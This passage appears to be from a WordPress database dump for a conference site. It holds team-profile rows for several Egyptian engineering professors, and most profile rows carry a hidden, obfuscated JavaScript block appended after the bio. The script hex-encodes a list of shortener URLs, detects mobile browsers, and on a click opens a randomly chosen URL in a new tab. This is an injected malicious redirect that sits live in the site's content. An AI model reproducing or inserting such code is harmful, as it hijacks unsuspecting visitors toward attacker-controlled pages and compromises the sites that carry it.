_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Dr.Eng. Loutfia ElSonbaty','','publish','closed','closed','','dr-eng-loutfia-elsonbaty','','','2023-01-14 21:35:17','2023-01-14 21:35:17','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3591',0,'dt_team','',0),
(3592,1,'2023-01-14 21:08:51','2023-01-14 21:08:51','','loc8','','inherit','open','closed','','loc8','','','2023-01-14 21:08:51','2023-01-14 21:08:51','',3591,'https://gsw2023.com/wp-content/uploads/2023/01/loc8.jpg',0,'attachment','image/jpeg',0),
(3593,1,'2023-01-14 21:12:30','2023-01-14 21:12:30','<!-- wp:cover {\"overlayColor\":\"accent\"} -->\n<div class=\"wp-block-cover\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-accent-background-color has-background-dim-100 has-background-dim\"></span><div class=\"wp-block-cover__inner-container\"><!-- wp:paragraph {\"align\":\"center\",\"placeholder\":\"Write title…\",\"fontSize\":\"large\"} -->\n<p class=\"has-text-align-center has-large-font-size\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table><tbody><tr><td>Working as an Assoc. Prof. of Geomatics (Chief of Geomatics Group) in Faculty of Engineering in Mataria- Helwan University- Cairo- Egypt; Module Leader of Site Surveying in University of Hertfordshire (UK) in Egypt Franchise. He has some high impacted research work in Remote Sensing Using AI and software development in Geomatics.</td></tr></tbody></table></figure>\n<!-- /wp:table --></div></div>\n<!-- /wp:cover -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Assoc. Prof. Dr. Eng. Ahmed Serwa','','publish','closed','closed','','assoc-prof-dr-eng-ahmed-serwa','','','2023-01-14 21:12:32','2023-01-14 21:12:32','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3593',0,'dt_team','',0),
(3594,1,'2023-01-14 21:11:45','2023-01-14 21:11:45','','loc9','','inherit','open','closed','','loc9','','','2023-01-14 21:11:45','2023-01-14 21:11:45','',3593,'https://gsw2023.com/wp-content/uploads/2023/01/loc9.jpg',0,'attachment','image/jpeg',0),
(3595,1,'2023-01-14 21:15:14','2023-01-14 21:15:14','<!-- wp:cover {\"overlayColor\":\"accent\"} -->\n<div class=\"wp-block-cover\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-accent-background-color has-background-dim-100 has-background-dim\"></span><div class=\"wp-block-cover__inner-container\"><!-- wp:paragraph -->\n<p>dr.ahmed.elhattab@eng.psu.edu.eg</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><br>Dr. El Hattab is a Professor of Surveying and Geodesy and the<br>Vice Dean for Community Service and Environmental<br>Development at the Faculty of Engineering at Port Said<br>University in Egypt. He possesses over thirty years of research<br>experience in Geomantic Engineering. His research interests<br>include geodetic networks, GNSS applications, hydrographic survey, and geodetic<br>datums. Dr. El Hattab has a strong consulting background and has worked on a<br>variety of geomatics projects in Egypt, Saudi Arabia, and Kuwait, particularly in<br>the field of CORS GNSS networks, precise leveling, and hydrographic surveying.</p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:cover -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof.  Ahmed Elhattab','','publish','closed','closed','','dr-ahmed-elhattab','','','2023-01-22 03:47:19','2023-01-22 03:47:19','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3595',0,'dt_team','',0),
(3596,1,'2023-01-14 21:15:03','2023-01-14 21:15:03','','loc10','','inherit','open','closed','','loc10','','','2023-01-14 21:15:03','2023-01-14 21:15:03','',3595,'https://gsw2023.com/wp-content/uploads/2023/01/loc10.jpg',0,'attachment','image/jpeg',0),
